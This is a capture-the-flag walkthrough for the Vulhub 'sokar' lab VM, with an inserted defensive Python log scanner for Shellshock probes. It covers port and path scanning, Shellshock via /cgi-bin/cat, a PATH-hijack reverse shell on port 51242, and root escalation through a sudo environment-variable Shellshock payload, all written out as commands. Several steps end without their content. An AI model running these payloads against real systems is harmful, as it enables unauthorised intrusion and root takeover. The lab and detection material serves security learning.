Vulhub-sokar
Tools:
- netdiscover
- Nmap
- Nikto
- User Agent Switcher
Vulnerability:
Use netdiscover to find the target's IP address:
netdiscover -i eth0 -r 192.168.56.0/24
192.168.56.103 is the target.
Then run nmap to detect open ports and running services on the target machine:
nmap -sV -v -O -A -T5 192.168.56.103 -p-
Port 591 is open and looks like it is running an HTTP service.
Use nikto to scan it:
nikto -h 192.168.56.103:591
Nothing interesting.
Use wfuzz to scan for paths:
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 http://192.168.56.103/FUZZ 2>/dev/null
It finds an interesting path, cgi-bin. That's interesting because it hints at Shellshock.
Use a browser to check the web page.
The web page shows the output of the commands netstat and iostat.
Checking the source code reveals the CGI path /cgi-bin/cat.
Start to verify Shellshock:
Confirmed. Also found two user names, bynarr and apophis.
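As an added example (not part of the original write-up), a small Python check a defender could run over web access logs to spot the header-based Shellshock probing just described: it parses combined-format log lines and flags User-Agent or Referer values carrying the "() {" function definition, noting whether the request hit a CGI path (where the header is actually evaluated). The log lines are constructed samples; /cgi-bin/cat is the CGI path from the write-up.

```python
import re
from typing import Dict, List, Optional

# Apache/Nginx "combined" access-log format; the sample below follows it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock trigger: a bash function definition "() {" in a value that the CGI
# wrapper exports as an environment variable; whitespace variants are accepted.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log; /cgi-bin/cat is the CGI script from the write-up.
SAMPLE_LOG = """\
192.168.56.1 - - [10/Mar/2015:10:01:02 +0000] "GET /cgi-bin/cat HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.56.1 - - [10/Mar/2015:10:01:09 +0000] "GET /cgi-bin/cat HTTP/1.1" 200 73 "-" "() { :;}; echo vulnerable"
192.168.56.1 - - [10/Mar/2015:10:01:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "() { :;}; echo probe" "curl/7.38.0"
192.168.56.1 - - [10/Mar/2015:10:01:20 +0000] "GET /cgi-bin/cat HTTP/1.1" 200 512 "-" "(){ :; }; echo probe"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(log_text: str) -> List[Dict[str, object]]:
    """Return every request whose User-Agent or Referer carries the "() {"
    function definition, tagged with the matching field and whether the
    request targeted a CGI path (where the header is actually evaluated)."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(entry[field]):
                hits.append({**entry, "field": field,
                             "cgi": entry["path"].startswith("/cgi-bin/")})
                break  # one report per request even if both headers match
    return hits


if __name__ == "__main__":
    for h in find_shellshock_attempts(SAMPLE_LOG):
        flag = "CGI target, header is evaluated" if h["cgi"] else "non-CGI path"
        print(f'{h["ts"]} {h["ip"]} {h["method"]} {h["path"]} via {h["field"]}: {flag}')
```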
I tried to upload a reverse shell:
Failed. I guess only certain ports are allowed.
Keep going…
Check the files belonging to bynarr:
Try to read each file I got, and find that /var/spool/mail/bynarr is very interesting.
So now I know I can only use port 51242 to set up a reverse shell.
I also noticed that . is in the $PATH environment variable, so a script in the current directory is run first.
Write the reverse shell to iostat:
Add the x (execute) attribute:
After several seconds I got a shell:
Next, run sudo -l to check the commands allowed for bynarr.
So /home/bynarr/lime, which is owned by root, is a command bynarr can run with sudo.
In order to check for Shellshock locally, run:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
Local Shellshock works.
From the sudo -l output, there are many environment variables that can be used. I used USERNAME:
sudo USERNAME='() { :;}; /bin/bash' /home/bynarr/lime
get the shell: